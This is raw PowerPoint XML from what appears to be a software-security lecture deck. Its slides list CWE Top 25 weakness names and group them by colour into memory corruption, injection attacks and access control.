            <a:off x="4641850" y="946472"/>
            <a:ext cx="4034606" cy="481612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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL Pointer Dereference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Use of Hard-coded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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Default Permissions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Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected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Permission Assignment for Critical Resource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Improper Restriction of XML External Entity Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XXE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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Server-Side Request Forgery (SSRF)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altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2189A8E0-8D35-39B6-6FEB-80FEC369C922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6553200" y="6248400"/>
            <a:ext cx="1893888" cy="446088"/>
          </a:xfrm>
        </p:spPr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45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8702181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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="7761288" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection attacks?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="240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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="980728"/>
            <a:ext cx="4030290" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Cross-Site Scripting (XSS)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Read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Improper Input  Validation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OS command injection         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SQL Injection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Use After Free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Path traversal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/>
              <a:t>Cross-Site Request Forgery (CSRF)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/>
              <a:t>Unrestricted Upload of File with Dangerous Type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Missing Authentication for Critical Function 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Integer Overflow or Wraparound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/>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="946472"/>
            <a:ext cx="4034606" cy="481612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NULL Pointer Dereference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Use of Hard-coded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Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Default Permissions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Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected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Permission Assignment for Critical Resource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Improper Restriction of XML External Entity Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XXE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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Server-Side Request Forgery (SSRF)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altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69485FDF-AF58-F80F-BE16-FAF0F24C8B82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6553200" y="6248400"/>
            <a:ext cx="1893888" cy="446088"/>
          </a:xfrm>
        </p:spPr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46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371492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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="7761288" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="980728"/>
            <a:ext cx="4030290" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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rgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900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Read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Improper Input  Validation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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS command injection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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection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Use After Free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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Path traversal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>
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>)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rgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unrestricted Upload of File with Dangerous Type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Missing Authentication for Critical Function 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Integer Overflow or Wraparound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>
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="946472"/>
            <a:ext cx="4106614" cy="481612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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL Pointer Dereference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Use of Hard-coded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Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Default Permissions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Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected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Permission Assignment for Critical Resource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>
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Restriction of XML External Entity Reference (XXE)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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>)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altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14856FB-32AE-A6C2-D498-C7CC8F321600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6553200" y="6248400"/>
            <a:ext cx="1893888" cy="446088"/>
          </a:xfrm>
        </p:spPr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47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42055316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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="7761288" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(authentication + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="980728"/>
            <a:ext cx="4030290" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Cross-Site Scripting (XSS)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Read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Improper Input  Validation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OS command injection         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SQL Injection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Use After Free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Path traversal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/>
              <a:t>Cross-Site Request Forgery (CSRF)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/>
              <a:t>Unrestricted Upload of File with Dangerous Type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Missing Authentication for Critical Function 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Integer Overflow or Wraparound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/>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="946472"/>
            <a:ext cx="4034606" cy="481612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NULL Pointer Dereference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Use of Hard-coded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Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Default Permissions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Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected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Incorrect Permission Assignment for Critical Resource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Improper Restriction of XML External Entity Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XXE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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Server-Side Request Forgery (SSRF)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altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBFE20E7-AD0F-FF3A-31F3-CE187C2BD211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6553200" y="6248400"/>
            <a:ext cx="1893888" cy="446088"/>
          </a:xfrm>
        </p:spPr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48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8204640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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="7761288" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(authentication + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="980728"/>
            <a:ext cx="4030290" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Cross-Site Scripting (XSS)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Out-of-bounds Read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Improper Input  Validation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OS command injection         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SQL Injection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Use After Free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Path traversal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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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/>
              <a:t>Unrestricted Upload of File with Dangerous Type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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Missing Authentication for Critical Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Integer Overflow or Wraparound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/>
              <a:t>Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="946472"/>
            <a:ext cx="4034606" cy="481612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/>
              <a:t>NULL Pointer Dereference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Use of Hard-coded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/>
              <a:t>Improper Restriction of Operations within Buffer Bounds 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Missing Authorization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Incorrect Default Permissions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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Sensitive Information to an Unauthorized Actor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Insufficiently Protected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Incorrect Permission Assignment for Critical Resource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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Restriction of XML External Entity Reference (XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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Server-Site Request Forgery (SSRF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975D845D-72CF-5108-39FB-DE7CD89C5016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6553200" y="6248400"/>
            <a:ext cx="1893888" cy="446088"/>
          </a:xfrm>
        </p:spPr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49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7517265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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661792" y="135383"/>
            <a:ext cx="8086672" cy="989361"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory corruption, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control / authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536154" y="1196752"/>
            <a:ext cx="4030290" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Out-of-bounds Write</a:t>
            </a:r>
            <a:r>
